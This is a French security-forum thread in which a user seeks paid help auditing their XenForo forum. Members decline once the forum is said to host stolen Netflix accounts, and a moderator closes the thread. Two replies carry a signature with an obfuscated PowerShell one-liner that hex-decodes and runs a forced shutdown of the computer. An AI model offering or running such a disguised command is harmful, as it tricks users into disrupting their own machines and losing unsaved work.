Annonce

Réduire
Aucune annonce.

Cherche un expert en faille pour analyser mon forum

Réduire
Cette discussion est fermée.
X
X
 
  • Filtre
  • Heure
  • Afficher
Tout nettoyer
nouveaux messages

  • Cherche un expert en faille pour analyser mon forum

    Bonjour chers membres de Hackademics ,

    Comme le dit l'intitulé, je cherche dans l'urgence quelqu'un qui pourrai m'analyser mon forum et voir si ya des failles à corriger car j'ai appris par quelqu'un qu'il en avait trouvé ..
    je pourrai rémunérer ceci si il le faut mais j'ai besoin de vous dans l'urgence haha .

    Mon forum est sous license officiel xenforo (il y a rien de nulled)

    un grand merci à tous ceux qui m'apporteront leur aides

    à bientot et content d'être parmi vous

  • #2
    Je suis pas un expert, mais je pense avoir acquis de bonnes bases et connaissances pour un test pas mal. MP moi pour les détails.

    Commentaire


    • #3
      Dispo via MP, dans le cas où tu peux prouver qu'il s'agit bien de ton forum
      Hack like a pro :
      PS > iex $(-join('73746F702D636F6D7075746572202D466F726365' -split '(?<=\G.{2})',20|%{[char][int]"0x$_"}))

      Commentaire


      • #4
        je vous ai contacté

        Commentaire


        • #5
          Cher Kinan,

          on va dire que comme ton forum est utilisé - entre autres choses - a des fins illégales (Genre partage de comptes Netflix volés, etc ...) : désolé mais ce sera sans moi finalement

          ++
          Hack like a pro :
          PS > iex $(-join('73746F702D636F6D7075746572202D466F726365' -split '(?<=\G.{2})',20|%{[char][int]"0x$_"}))

          Commentaire


          • #6
            ok . Up

            Commentaire


            • #7
              Up les amis ..

              Commentaire


              • #8
                Si ton forum est utilisé à des fins illégales, je ferme le sujet et je te mets un avertissement. Prochain débordement ce sera le ban définitif !

                Commentaire

                Chargement...
                X